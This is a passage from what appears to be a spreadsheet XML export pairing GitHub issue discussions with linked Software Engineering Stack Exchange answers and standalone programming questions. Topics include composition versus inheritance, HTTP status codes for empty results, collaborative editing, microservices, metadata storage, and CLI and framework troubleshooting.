          &amp;quot;title&amp;quot;: &amp;quot;Samsung RF23M8580SG/SA Water Filter Replacement - $12.95!&amp;quot;,
          &amp;quot;snippets&amp;quot;: [
            {
              &amp;quot;snippet&amp;quot;: &amp;quot;A quality alternative refrigerator water filter for RF23M8580SG/SA Samsung French Door refrigerators made by SpiroPure. A certified replacement filter!&amp;quot;,
              &amp;quot;htmlSnippet&amp;quot;: &amp;quot;A quality alternative refrigerator water filter for RF23M8580SG/&amp;lt;b&amp;gt;SA&amp;lt;/b&amp;gt; Samsung French Door refrigerators made by SpiroPure. A certified replacement filter!&amp;quot;
            }
          ],
          &amp;quot;pagemap&amp;quot;: {
            &amp;quot;metatags&amp;quot;: [
              {
                &amp;quot;fb:app_id&amp;quot;: &amp;quot;276534796844437&amp;quot;,
                &amp;quot;og:url&amp;quot;: &amp;quot;[productPageURL]&amp;quot;,
                &amp;quot;og:image&amp;quot;: &amp;quot;[largeImageURL]&amp;quot;,
                &amp;quot;format-detection&amp;quot;: &amp;quot;telephone=no&amp;quot;,
                &amp;quot;og:description&amp;quot;: &amp;quot;A quality alternative refrigerator water filter for RF23M8580SG/SA Samsung French Door refrigerators made by SpiroPure. A certified replacement filter!&amp;quot;,
                &amp;quot;thumbnail&amp;quot;: &amp;quot;[thumbnailImageURL]&amp;quot;,
                &amp;quot;viewport&amp;quot;: &amp;quot;width=device-width, initial-scale=1, shrink-to-fit=no&amp;quot;,
                &amp;quot;og:type&amp;quot;: &amp;quot;website&amp;quot;,
                &amp;quot;msapplication-config&amp;quot;: &amp;quot;none&amp;quot;,
                &amp;quot;og:title&amp;quot;: &amp;quot;Samsung RF23M8580SG/SA Water Filter Replacement - $12.95!&amp;quot;
              }
            ],
            &amp;quot;cse_image&amp;quot;: [
              {
                &amp;quot;src&amp;quot;: &amp;quot;[largeImageURL]&amp;quot;
              }
            ],
            &amp;quot;cse_thumbnail&amp;quot;: [
              {
                &amp;quot;height&amp;quot;: &amp;quot;225&amp;quot;,
                &amp;quot;src&amp;quot;: &amp;quot;[thumbnailImageURL]&amp;quot;,
                &amp;quot;width&amp;quot;: &amp;quot;225&amp;quot;
              }
            ],
            &amp;quot;thumbnail&amp;quot;: [
              {
                &amp;quot;src&amp;quot;: &amp;quot;[thumbnailImageURL]&amp;quot;
              }
            ]
          }
        }
      }
    }
  ],
  &amp;quot;totalSize&amp;quot;: 1,
  &amp;quot;attributionToken&amp;quot;: &amp;quot;xgHwxQoMCJff_bsGEOHmuM0CEiQ2YWJkZjA1OS0wMDAwLTI4MmEtOGZiYy0zYzI4NmQzZDZkMmEiB0dFTkVSSUMqhAGc1rctxPzLMOndxDD59rMtkPeyMVrw4GDGy_MXrfizLY6RyTCuxIot24-aIqOJsy3O5rUvxMaxMI2ktDDMndswoImzLdHmtS-rxIot3o-aIpWSxTC9C3eT_PazLZ_Wty3C8J4VkKS0MLe3jC3m3cQwwfzLMMfGsTDUsp0Vo4CXIqr4sy0wAQ&amp;quot;,
  &amp;quot;nextPageToken&amp;quot;: &amp;quot;EmMkZDZzQmN4IzYz0rGeRTGOtEmM4ITLwADMw0CO1AjZkJRCGWtGDILs5mIEGwbjIfJCMIBMxIgC&amp;quot;,
  &amp;quot;summary&amp;quot;: {}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So the new response missing the Whole object &amp;quot;pagemap&amp;quot;.&lt;/p&gt;
&lt;p&gt;So i am looking the solution to get below object back shown is Old response above,
&amp;quot;pagemap&amp;quot; =&amp;gt; &amp;quot;metatags&amp;quot;, &amp;quot;cse_image&amp;quot;, &amp;quot;cse_thumbnail&amp;quot;, &amp;quot;thumbnail&amp;quot; back&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C882</t>
  </si>
  <si>
    <t>Make DrawerView extensible.
Hi! I really don't see why not, but just out of curiosity, how'd you like to extend it?
I'd like to have almost a viewDidLoad like function where I could setup the contents of the drawer, this allows a nicer compartmentalized drawerview rather than having to do that all in the view controller.
Hi!
While there is nothing wrong with making the DrawerView class open, this specific use case is already handled in a better way by the library.
The problem you're describing should not be solved by inheritance if possible.
When the DrawerView is being initialised, all it needs is it's content view. That already guarantees the compartmentalisation you're talking about: the code to set the drawer up is separate from the code that creates the content view (or rather it's ViewController).
See the repository code (particularly the Extensions.swift file and DrawerViewExample) to see how to best achieve that.
Here's an easy to digest explanation of inheritance vs composition (and why the latter is preferred): https://softwareengineering.stackexchange.com/a/371715</t>
  </si>
  <si>
    <t>TL;DR: Attempting to use composition first, before attempting to use inheritance, prevents naive mistakes. Also, Class Inheritance:
Is easy to misuse.
Is less versatile than composition.
Is less versatile than interface inheritance.
Requires more maintenance than composition.
Provides some good guarantees about the derived types.
Consider if it is worth the points above.
Should be used when we need to follow the
Liskov substitution principle
.
Can be necesary to extend poorly designed third party systems.
Blame the third party.
Also, Java is not perfect.
Composition over Inheritance
Why does inheritance have so much hate in OOP and industry?
I think "hate" is not a fair representation. You will find lots of advice towards using composition over inheritance, because:
Composition is much more versatile.
Inheritance is easy to abuse, and beginners could avoid many naive mistakes by trying to use composition first.
Below are examples where a developer may want to solve the problem with inheritance, but it is not the best option.
Not exactly "is-a"
For example, sometimes people will use inheritance for things that fail the "is-a" relationship. Well, rather, I should say that fit much closer a "behaves-as" relationship. For example, in a video game I would have a lot objects that are visible, that I need to make sure to render them properly. It can be tempted to say that - for example - "Enemy is-a Visible", thus creating a
Visible
class. However, that is wrong. The correct thing to do is to make an
IVisible
interface.
In video games, sometimes you will find a push to say, "Enemy has-a Visible component". That has some advantages, for example, if I want to create an enemy that can turn invisible. Note: Yes, I could have a bool
IsVisible
and check, but if I have a list of
Visible
, and I remove it, I do not have to check at all.
A green car is not another type of car
A “Green Car is-a Car”, but it is impractical, ill-advised, and just plain wrong to create a
GreenCar
class when we can have a color attribute. That way, we do not need to create a new class every time we need a new color.
Also, with inheritance, how do you change color?
That is composition over inheritance.
Addendum
:
Perhaps, you have another class, let us say:
Building
. And just like
Car
,
Building
also has a color. Should you create a
ColoredThing
base class? No. You should not. Why? Well, what if both
Car
and
Building
also have an owner... should it be
OwnedThing
then? Nope.
You see, if you abstract any common attributes, you will end up with a badly designed inheritance tree, and wanting to use multiple inheritance where it is not solving any real problem.
What if you need a list of things that have color? Should you use a
ColoredThing
class then? No. You should use an interface.
Why? Again, what do you do when you also need a list of
OwnedThing
? - It is about being
open to extension
. Interface is better because it does not narrow the possibilities to extend the system as much as a class does.
Is that what you call copy and paste? I would argue that is not copy and paste.
Ok, there is an argument for not repeating yourself there... One day you will discover that cars and buildings do not have a single color, they have multiple! Now you have to add more colors to all the things... I will grant that is bad, you should be able to change these things in a single place. No matter, changing the attribute of a type is easier than replacing a base class... Replace all your color attributes with a
Coloring
class, and your
Coloring
can have multiple colors.
From Multiple Inheritance to Component Systems
For example, if in the video game, the "Avatar is-a Soldier" (can use guns and shoot stuff). And in addition, the "Avatar is-a Pilot" (can drive vehicles), it can be tempting to use multiple inheritance.
Leaving aside that we have plenty of languages without multiple inheritance...
How do you model the
Avatar
learning a new ability? Under this model, you could have bool flags. The
Avatar
is created being a
disabled
Pilot. The more abilities you want to program in the game, the more stuff like that you need to add.
Multiple inheritance will become hard to maintain. Using interfaces will lead to code duplication, also hard to maintain. Use composition: the "Avatar has PilotAbility".
As you can see, composition is in particular more versatile than inheritance in languages without multiple class inheritance. Futhermore, I would argue that many languages do not have it by design, not by oversight. Multiple inheritance is easy to misuse, so it is restricted to the sane cases (interfaces), and we have alternative for other situations.
When to use Inheritance
Is there a valid case to use inheritance noadays?
We have - at least - three elephants in the room. I will quickly dispose of two of them and acknowledge the third...
You do not
need
inheritance. Evidence is that some languages just straight up do not have it, and they are perfectly usable. However, inheritance can be convenient.
Sometimes, you need to work with a system that require inheritance for extension. In that case you
need
inheritance, because the design of that system has narrowed your options. However, it does not imply that such system (or an alternative one that serves the same purpose) was impossible without inheritance. Why did they choose inheritance? Convenience. Note: I will shove down creating custom exceptions here.
Interface inheritance is inheritance. However, I will be dealing with interface inheritance as if it were something else. Note: the advent of Default Methods removes some use cases of class inheritance.
Note: inheritance sometimes is an optimization, I will not be talking about that,
I think optimization as an argument for inheritance is too weak.
However, I want to mention that UI and widget libraries often take advantage of the fact that calling a virtual method can perform better than callbacks, listeners, observers, continuations, et. al. In fact, if your language does not support function references (Java, for example), using inheritance and calling virtual methods will be the most efficient way to delegate and notify.
Thus, we will not be talking about the
need
of inheritance, Instead we will be talking about the convenience.
With that said, yes, there are valid use cases.
Liskov substitution principle
You should be able to use the derived type everywhere you can use the base type.
Sometimes people would resort to inheritance, and then have to hide, set to null, or throw exceptions in members they do not want. In that situation is better to use composition.
Unless we are extending a third party system, and inheritance was the only option (because we need virtual methods or we need to call methods that expect the base class), blame the third party.
I did a search in my code base, discarded all the cases where I had to use inheritance to extend a third party system, discarded all the cases that I would do differently with default methods, and arrived to the following example:
Consider a library that has a
SortedSet
type and that has a method which allows creating a
SubSet
from it. These subsets are not like the base type (they do not actually store the items), instead they are a view defined by a range and a reference to the set of which they are a subset. However, a subset "is-a" set.
In this case, I will have another type that actually stores the items, and
SortedSet
will have a reference to it (composition). Now both the
SortedSet
and the
SubSet
would have a reference to the same storage object. The
SubSet
type also has other two members that define the range. There are also virtual methods in
SortedSet
that
SubSet
will override (for example to allow you to take subsets of the subsets).
What is important here is that the
SubSet
from the point of view of the consumer is a
SortedSet
. In fact, I can make my
SubSet
class private and only expose it from
SortedSet
, as a
SortedSet
, without any loss of functionality (and I have done so).
Now, why was it important to use inheritance instead of composition? Because the derived class should be usable everywhere the base case class should be useable (Liskov substitution principle).
Why did I not use interfaces? Because the implementation of the subset is very tight to its parent, they share a lot of code, and are aware of each other (in fact the parent instantiates the derived class). Furthermore, you do not need to know they are different classes, at all, to be able to use them. While if I had used an interface, you had to remember to define your parameters as the interface instead of the class to be able to allow both.
Note: The
SortedSet
also implements an
ISet
interface. Moreover, yes, they are all generic.
Inheritance as guarantees
Inheritance, when combined with proper use of virtual and sealed(.NET)/final(Java) members, means that you have a tight control over the implementation, and thus you can trust it.
You will find this useful in scenarios where you deal with external resources, which you would need to pass around to allow extension. If the derived class can use the external resource in ways that would screw up the system, then we do not want everybody using derived classes that mess with the system.
In these situations, you would create an inheritance tree with the derived classes you might need. However, if designed properly, the consumer of the library can use them in composition, without the need of inheritance.
Bad composition
When is it considered a bad design pattern to use composition over inheritance?
Breaking the Liskov substitution principle
When you intend the types are replacements. By wrapping a type instead of inheriting from it, I would not be able to use my new type in all the places where I can use the base type. Thus, if I intend my type as a replacement, I should be using inheritance.
Notice that inheritance and composition should work together. For instance, thanks to composition, I can remove or change the components of an object, and thanks to inheritance, I can use replacements of different types.
Java
Java source code is full of inheritance and deep inheritance. Does it mean Java source is poorly designed?
I read this as an
Argument from authority
in disguise: If Java uses inheritance, and the people that created Java are smart, it must be smart to use inheritance.
Well, hold your horses...
First, let us be clear on that Java is - at least - three things: the language, the standard library and the virtual machine. I know you ask about the standard library. Soon it will make sense why I point this out.
Now, Java is not perfect. Some aspect of its design show its age. Sure, we have deprecations, but some things are too deeply rooted in Java that deprecation is not feasible. I will come back to the archaic parts of Java. First, let us see what parts use inheritance appropriately.
Appropriate use of inheritance
Disclaimer: I do not know the standard library by memory, or ever did. In fact, it has been a while since I used Java for anything serious. Thus, I am looking at this:
Hierarchy For All Packages
.
Using inheritance for exceptions (
Throwable
) and enums, is the state of the art.
There are things that interface with external resources, such as UI and database related types. I will give these a pass.
I see some threading related types use inheritance. This makes sense, just as with external resources, inheritance provides useful guarantees. We can make a similar argument for reflection.
Archaic but justified
The abstract data structures probably should be interfaces (and perhaps accompanied by utility classes). I am aware that these abstract data structures have usable common code, and thus simply making those interfaces will not do. In addition, default methods did not exist back when those were created (default methods required improvements to the language - and probably the virtual machine), and Java does not have something like extension methods. Therefore, they are archaic but justified.
I would argue that the whole listener model is a bad, at least for modern standards. The thing is that Java lacks a way to reference functions (virtual machine limitation). Therefore, they are stuck with this. Before Java had anonymous classes (language improvement), you would rather implement
EventListener
in your class. That was preferable to creating a bunch of small classes to implement each event type and solving what members you need to share and how to do it without breaking encapsulation. In the implementation of
EventListener
you would need to sort out the type of events, requiring to match the type of the
EventObject
. Thus, we need many sub types of
EventObject
. Therefore, this is archaic but justified.
The lang visitors, the text formats and other stuff that require some form of iteration, or work on strings or binary streams relies on inheritance. Considering that listeners are a pain (and there were nothing like the Stream API) it was better to use inheritance. Thus, these are all in the same boat: archaic but justified.
Other notes
Copy and Paste
Copy and paste is the second oldest form of reutilization (being transcription the first one). With that said, we would rarely, (in fact, I would argue, we would never) advocate for copy and paste.
In the example:
Class Shape {
    private String name;
    private double area;
    public double getArea()
}
Class Rectangle extends Shape {
}
It is not clear why you need a
Rectangle
class. I would argue that you could work with
Shape
only since
Rectangle
is not adding anything. If
Rectangle
will be adding more stuff, then inheritance would be useful here.
they would rather copy and paste the class Shape had only them 2 fields and that single method
No, please, do not copy and paste just to avoid inheritance. The argument is between inheritance and composition: Should you say that the "Rectangle has a Shape"? Refer to the Liskov substitution principle, if
Rectangle
is meant to be used where
Shape
is used, use inheritance.
On method overloads
If I create a method that accepts type T, it will also accept any object of a type derived from T. If you cannot modify this class, and you need this method, you will have to inherit from T. Now, the suggestion is to be as permissive as possible with what you accept, and usually means using an interface that closely resembles how the method will be using the object.
If we are working in a dynamically typed language, there is no method overloading and we will have to interrogate the objects, but that is another thing.
See
Liskov substitution principle
and
Interface segregation principle
.</t>
  </si>
  <si>
    <t xml:space="preserve">We are building a solution for document storage and for each document we need to store a lot of extra metadata with it to comply with local regulations, ranging from basic data like title or description to dates of relevant events or disposition and classification rules.
I've seen different types of solutions, but none convinces me:
Tables that grow in columns when a new metadata slot is added (so they have as many columns as metadata associated with the documents)
Tables with a lot of spare generic columns. Very similar to 1. but the tables don't grow (less permissions)
A table of document ids, metadata keys and metadata values.
A table with metadata definitions and metadata keys in 3. are substituted by metadata ids. We used this solution in the past. The tables have millions of rows at the end.
A text field in the document table or associated table that stores a XML or other structured information with all the metadata in key-value pairs.
I'm biased towards number 5, providing a parallel full-text index (Lucene.Net? Other?) to search by relevant metadata (not everything has to be "searchable").
Any suggestion? Similar experiences?
</t>
  </si>
  <si>
    <t>C883</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following ~minimal code:&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;from typing import Annotated
import typer
def main(
    username: Annotated[
        str,
        typer.Option(&amp;quot;--username&amp;quot;, &amp;quot;-u&amp;quot;, help=&amp;quot;Short username&amp;quot;, show_default=False),
    ],
    cluster_name: Annotated[
        str,
        typer.Option(&amp;quot;--cluster-name&amp;quot;, &amp;quot;-c&amp;quot;, help=&amp;quot;Name of the cluster&amp;quot;),
    ] = None,  # type: ignore
):
    if cluster_name is None:
        cluster_name = f&amp;quot;{username}-cluster&amp;quot;
    print(&amp;quot;Username is&amp;quot;, username)
    print(&amp;quot;Cluster name is&amp;quot;, cluster_name)
if __name__ == &amp;quot;__main__&amp;quot;:
    typer.run(main)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works, but obviously, the output of &lt;code&gt;--help&lt;/code&gt; is wrong, because the actual/implicit default value of &lt;code&gt;cluster_name&lt;/code&gt; is not &lt;code&gt;None&lt;/code&gt;. I am trying to understand how can I have a more streamlined solution. Maybe something like:&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;cluster_name: Annotated[
    str,
    typer.Option(&amp;quot;--cluster-name&amp;quot;, &amp;quot;-c&amp;quot;, help=&amp;quot;Name of the cluster&amp;quot;),
] = f&amp;quot;{username}-cluster&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which obviously is not possible because &lt;code&gt;username&lt;/code&gt; is not defined at that point. But, maybe there's a way to get it? I know there's something with the context, but I don't know how to use it in this case.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C884</t>
  </si>
  <si>
    <t>Clarify HTTP response status codes in reframe/REFRAME_HTTP_TRANSPORT.md for empty results
My vote is that we return a 2xx in this case. My justification is to be consistent with the montra of "4xx codes Tell a UA it did something wrong, the request it constructed isn't proper and shouldn't try it again, without at least some modification". In our case, the client hasn't done anything wrong and doesn't need to modify anything. The reframe server (STI) doesn't have any results at this time. Yes, it's true that 404 Not Found in Wikipedia has the definition of "The requested resource could not be found but may be available again in the future. Subsequent requests by the client are permissible." I still think it's cleaner for 4xx response code to be in the territory of "client-side error" rather than special-casing 404 out of this understanding.
There is good discussion on this topic here: https://softwareengineering.stackexchange.com/questions/203492/when-to-use-http-status-code-404-in-an-api</t>
  </si>
  <si>
    <t>When in doubt, [consult the documentation][1]. Reviewing the W3C definitions for HTTP Status codes, gives us this:
&gt; 200 OK - The request has succeeded. The information returned with the response is dependent on the method used in the request.
&gt;
&gt; 404 Not Found - The server has not found anything matching the Request-URI.
In the context of your API, it very much depends on how queries are created and how objects are retrieved. But, my interpretation has always been that:
 - If I ask for a particular object, and it exists return `200` code, if it doesn't exist return the correct `404` code.
 - But, if I ask for a set of objects that match a query, a null set is a valid response and I want that returned with a `200` code. The rationale for this is that the query was valid, it succeeded and the query returned nothing.
So in this case **you are correct**, the service isn't **searching** for "a specific thing" it is **requesting** a particular thing, if that thing isn't found say that clearly.
I think Wikipedia puts it best:
&gt; 200 OK - ... The actual response will depend on the request method used. In a GET request, the response will contain an entity corresponding to the requested resource.
&gt;
&gt; 404 Not Found - The requested resource could not be found but may be available again in the future. Subsequent requests by the client are permissible.
Seems pretty clear to me.
## Regarding the example requests
    /GoalTree/GetByDate?versionDate=...
    /GoalTree/GetById?versionId=...
For the format, you said, you always return the nearest revision to that date. It will never not return an object, so it should always be returning `200 OK`. Even if this were able to take a date range, and the logic were to return all objects within that timeframe returning 200 OK - 0 Results is ok, as that is what the request was for - the set of things that met that criteria.
However, the latter is different as you are asking for a *specific object*, presumably unique, with that identity. Returning `200 OK` in this case is wrong as the requested resource doesn't exist and is **not found**.
## Regarding choosing status codes
 - **2xx codes** Tell a User Agent (UA) that *it did the right thing*, the request worked. It can keep doing this in the future.
 - **3xx codes** Tell a UA what you asked probably used to work, but that thing is now elsewhere. In future the UA might *consider just going to the redirect*.
 - **4xx codes** Tell a UA *it did something wrong*, the request it constructed isn't proper and shouldn't try it again, without at least some modification.
 - **5xx codes** Tell a UA *the server is broken somehow*. But hey that query could work in the future, so there is no reason not to try it again. (except for 501, which is more of a 400 issue).
You mentioned in a comment using a 5xx code, but your system is working. It was asked a query that doesn't work and needs to communicate that to the UA. No matter how you slice it, this is 4xx territory.
## Consider an alien querying our solar system
&gt; Alien: Computer, please tell me all planets that humans inhabit.
&gt;&gt; Computer: 1 result found. Earth
&gt;
&gt; Alien: Computer, please tell me about **Earth**.
&gt;&gt; Computer: Earth - Mostly Harmless.
&gt;
&gt; Alien: Computer, please tell me about all planets humans inhabit, outside the asteroid belt.
&gt;&gt; Computer: 0 results found.
&gt;
&gt; Alien: Computer, please destroy Earth.
&gt;&gt; Computer: 200 OK.
&gt;
&gt; Alien: Computer, please tell me about **Earth**.
&gt;&gt; Computer: 404 - Not Found
&gt;
&gt; Alien: Computer, please tell me all planets that humans inhabit.
&gt;&gt; Computer: 0 results found.
&gt;
&gt; Alien: Victory for the mighty Irken Empire!
  [1]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html</t>
  </si>
  <si>
    <t xml:space="preserve">What is the correct way to implement and architect a command line tool as a C# console application?
Concerns to address include proper parsing of command line variables, and the proper way to output text.  While Console.WriteLine() is the most obvious choice for output, what are the circumstances in which one should instead opt to write to the standard error stream, .Error, .SetErrorStream, etc?
What is the proper way for the application to exit while returning a proper return code to the calling command?
How should the the CancelKeyPress event be implemented to interrupt the program? Is it only for use when an asynchronous operation is occurring on a separate thread?
Is there a concise guide to command line tool programming in C#, or even better an open source project or template which I could use to properly implement a relatively simple tool?
</t>
  </si>
  <si>
    <t>C885</t>
  </si>
  <si>
    <t>Support backend workflow version control for async multi-user scenario
https://softwareengineering.stackexchange.com/questions/202815/how-to-save-during-real-time-collaboration
Very useful stackexchange question regarding this issue:
It suggests two way of implementing this:
Use Google' realtime API which has OT implemented inside.
General Solution:
_1) _ let server be the multiplexer , it always has the most up-to-date view of the document.
_2)_For conflict resolving: Find a third party algorithm/module, doing this alone is tough , if can't use third party algorithm then simply prompt the user.
_3)_When a new user joins, give them the most recent document and automatically start streaming the commands to them. The server has the most recent view and thus can dish it out automatically.
_4)_Backup to the database at certain intervals. Decide how often you want to back up (every 5 minutes or maybe every 50 changes.) This allows you to maintain the backup you desire.
Drawbacks:
_1)_Throughput of the server could bottleneck performance
_2)_Too many people reading/writing could overload the server
_3)_People may become out of sync if a message is lost, so you may want to make sure you synchronize at regular points. This means sending out the whole message again, which can be costly, but otherwise people might not have the same document and not know it.
Currently we can only perform the undo redo service on the frontend and it is cached only in the browser, which means that after closing the browser or refreshing it the previous saved version of workflow will disappear. In the backend, it uses the endpoint PersistWorkflow to update the workflow, for auto-save or saving by the user, it only does the replacing/updating in the backend, we will lose previously saved version and cannot restore, we want it to be changed to having multiple version of previous workflow stored and have certain kind of version control over merging these workflow histories when it comes to an async multi-user scenario
Todo is to first explore the easier case, which is the system without user system--One user, Sequential. Then, Some research should be conducted for similar cases of the harder async multi-user scenario. Similar implementation like Google Doc can be investigated for this purpose. Progress will be posted under this issue.
versioned autosave workflow
Autosaving a workflow while maintaining the previous versions means this setting
The change is frequent (cache intermediate actions)
The difference is relatively small (compute the difference)
Persist the difference (write the difference)
List versions (list the number of versions)
Retrieve a version (apply patch)
MLflow tracking is an example application that uses Git to version a model. Since our workflow change is frequent and the underling representation is not code, this doesn't directly apply to us.
Automatiko and Temporal.io do workflow version control but the setting is different as the assumption is the version is not frequent or how to apply the new version to an ongoing execution of the workflow.
Next step is to follow the 5 steps above to do the version control. similar to Google's Autosave and Chrome's Autosave.
Since our workflow is internally represented as a JSON object. Tools to compute the difference and apply patches are listed below.
Json-patch
zjsonpatch</t>
  </si>
  <si>
    <t>## Google Drive ##
If you're trying to make your own version of google docs, I suggest you take a look at the [Google Realtime API](https://developers.google.com/drive/realtime/). Google recently released this with the intent of allowing other developers to use the same tools they did to allow for realtime collaboration. This would allow you to save time on your development and get a working product sooner.
You could easily take the data that is in the document and push it into your database at regular intervals, or have the database itself be a 'participant' of the exchange, simply listening to and logging all the changes. It also allows for a user to define their own data structures which are then usable in the realtime API, so you are free to extend it as you see fit.
# Non-Google Drive
So according to your research, Google Drive isn't an option. That's fine, but it's going to be tougher and possibly not work as well, depending on how much you put into it.
Here's a **general strategy** *I* would use to accomplish this problem:
1. Have the server be the communication multiplexer. Each person talks to the server, and the server sends out that information to everyone else. This way the server always has the most up to date view of the document.
2. Find a third party algorithm/module for conflict resolution. Conflict resolution is tough, and is something that still isn't perfect. Doing this alone could easily increase the scope of the project to be far too large. If you can't use a third party algorithm, I would suggest that you only allow one user to edit an area of a time, so that the user must obtain a lock before editing an area, or you risk destroying another users work, which will get very old, very fast.
3. When a new user joins, give them the most recent document and automatically start streaming the commands to them. The server has the most recent view and thus can dish it out automatically.
4. Backup to the database at certain intervals. Decide how often you want to back up (every 5 minutes or maybe every 50 changes.) This allows you to maintain the backup you desire.
**Problems:** This isn't a perfect solution, so here are some issues you might face.
1. Throughput of the server could bottleneck performance
2. Too many people reading/writing could overload the server
3. People may become out of sync if a message is lost, so you may want to make sure you synchronize at regular points. This means sending out the whole message again, which can be costly, but otherwise people might not have the same document and not know it.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are using Azure container apps to host a python api using fastapi. The app uses Dapr &lt;em&gt;bindings.azure.servicebus.queues&lt;/em&gt; and &lt;em&gt;pubsub.azure.servicebus.queues&lt;/em&gt; components.&lt;/p&gt;
&lt;p&gt;Everything has worked fine since this application was built in 2021. However, now when upgrading fastapi from version 0.70.0 to version 0.110.1, the Dapr component &lt;em&gt;bindings.azure.servicebus.queues&lt;/em&gt; is no longer being registered when deploying to Azure container apps.&lt;br /&gt;
Strangly enough the publish functionality of &lt;em&gt;pubsub.azure.servicebus.queues&lt;/em&gt; component sort of still functions properly. The app can still send messages to the servicebus but can no longer subscribe.&lt;/p&gt;
&lt;p&gt;The obvious answer is that this is a big jump in fastapi versions which then also bumps the dependencies used in fastapi. However I am not proficient in the internal workings and dependencies of fastapi, and the code from 2021 was not written by myself. I am hoping someone here maybe has an idea to why this Dapr component would no longer be registered when deploying to Azure container apps.&lt;/p&gt;
&lt;p&gt;Below is the requirements.txt the app has been using:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;fastapi==0.70.0
zeep==4.1.0
hypercorn==0.12.0
xmlsec==1.3.13
lxml==4.9.2
dapr==1.4.1
azure-functions==1.11.2
azure-identity==1.11.0
azure-keyvault-certificates==4.6.0
azure-keyvault-secrets==4.6.0
cryptography==43.0.3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Currently we had to revert the container app back to the old versions so that the Dapr components would function properly.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C886</t>
  </si>
  <si>
    <t>Setting deadline for a gRPC call
Is your feature request related to a problem? Please describe.
Whenever I trigger high amount of server stream gRPC calls towards our server, I'm seeing
Server signaled RPC failed  io.grpc.StatusRuntimeException: INTERNAL: context deadline exceeded
Describe the solution you'd like
Is there a way to set deadline for gRPC call in client end, something like this
grpc("sample server")
          .serverStream("fetchInfo")
          .start(SampleServerStreamRequest.defaultData)
          .withDeadlineAfter(deadlineMs, TimeUnit.MILLISECONDS)
Have fun debugging a distributed system!
I have a problem. Let's use Microservices! Now I have 13 distributed problems.
https://softwareengineering.stackexchange.com/a/339234</t>
  </si>
  <si>
    <t>I have a problem. Let's use Microservices! Now I have 13 distributed problems.
Dividing your system into encapsulated, cohesive, and decoupled components is a good idea. It allows you to tackle different problems separately. But you can do that perfectly well in a monolithic deployment (see
Fowler: Microservice Premium
). After all, this is what OOP has been teaching for many decades! If you decide to turn your components into microservices, you do not gain any architectural advantage. You gain some flexibility regarding technology choice and possibly (but not necessarily!) some scalability. But you are guaranteed some headache stemming from (a) the distributed nature of the system, and (b) the communication between components. Choosing microservices means that you have other problems that are so pressing that you are willing to use microservices despite these problems.
If you are unable to design a monolith that is cleanly divided into components, you will also be unable to design a microservice system.
In a monolithic code base, the pain will be fairly obvious. Ideally, the code will simply not compile if it is horribly broken. But with microservices, each service may be developed separately, possibly even in different languages. Any problems in the interaction of components will not become apparent until you integrate your components, and at that point it's already too late to fix the overall architecture.
The No 1 source of bugs is interface mismatch. There may be glaring mistakes like a missing parameter, or more subtle examples like forgetting to check an error code, or forgetting to check a precondition before calling a method. Static typing detects such problems as early as possible: in your IDE and in the compiler,
before
the code ever runs. Dynamic systems don't have this luxury. It won't blow up until that faulty code is executed.
The implications for microservices are terrifying. Microservices are inherently dynamic. Unless you move to a formal service description language, you can't verify any kind of correctness of your interface usage. you have to test, test, test! But tests are expensive and usually not exhaustive, which leaves the possibility that problems might still exist in production. When will that problem become apparent? Only when that faulty path is taken, at run time, in production. The notion that prod issues would lead to faster feedback is
hilariously
dangerously wrong, unless you are amused by the possibility of data loss.</t>
  </si>
  <si>
    <t xml:space="preserve">I am currently working on a very large legacy MFC MDI application.  It has a large number of UI elements - dockable toolbars, custom tree controls, context menus, etc.  It is an image processing application so the main views render themselves using DirectX and OpenGL.  The product is about 10 years old and one of the priorities here is to update the look and feel of it.
Knowing that Microsoft has done a good job of providing interoperability between C++/MFC and .NET I thought it would make sense to migrate the code base incrementally.  What I'm struggling with now is where to start.  
One approach is to rip out the MFC framework with WPF and reuse as much of the C++ code as we can.  This will let us maximize the benefits of the WPF architecture but will mean a long development period until we're fully functional again.
Another approach is to replace MFC controls one at a time with their WPF counterparts.  This will allow us to work incrementally.  My concern with this approach is that it means there will be an awful lot of connection points between managed and unmanaged code and I'm not sure where to start with replacing things like the main menu and toolbars.
Or is there another option here I'm not seeing?
Any suggestions or links to information on this topic would be appreciated.  
Update:  DavidK raised some excellent questions so I'm adding the motivations behind this.
1) Future development of the product  
This product is still being actively developed with new features getting added on a regular basis.  I thought that it would make a lot of sense to try and slowly migrate towards C#/WPF.  In my limited experience with C#/WPF I found the productivity gains to be amazing over working in C++/MFC.
The other big thing we're getting with WPF is the ability to take advantage of multi-head systems.  MFC applications are limited to a single top level frame, making it very difficult to leverage multiple monitors.
2) Employee retention and recruitment
It's getting harder and harder to find developers who are willing to work on MFC.  It's also important for the career development of the current developers to get exposure to newer technologies.
</t>
  </si>
  <si>
    <t>C887</t>
  </si>
  <si>
    <t>Topic
This issue is about discussing the best implementation of custom fields in eLabFTW, and how they could be machine-readable.
Preamble
In this document the word "item" will designate both an "experiment" and a "database item".
Problem
eLabFTW doesn't have the ability to create custom fields into experiments. The structure of an item is basically "title", "date", "body" (with secondary fields like "tags", "attached files", "steps", "links", etc...).
Now let's say you want to have a field that is "Pressure", and you want this field to be required and only allow a number between 0 and 200, you can't do that.
This feature is something that is often requested, but quite difficult to implement properly.
Adding custom fields on a mysql database can be tricky.
As you can see here:
https://softwareengineering.stackexchange.com/questions/377613/how-should-i-implement-custom-database-fields
and here:
https://softwareengineering.stackexchange.com/questions/148551/design-patterns-strategies-for-custom-fields-data-types
It's kind of an open problem, with every solutions having pros and cons.
That's not the road I want to take.
Proposed solution
Use JSON, along with the JSON editor.
For instance, a workflow I'm thinking about:
Admin creates a template that also contains a json file. This json
file contains all the necessary fields like Pressure and such, but they
are empty.
Technician creates an experiment from that template, they still have
access to all the normal elab interface, but on top of that, they fill
the json file using the json editor, so we can make sure that data
mining can be done later.
Pros: already in json so very easy to parse/process
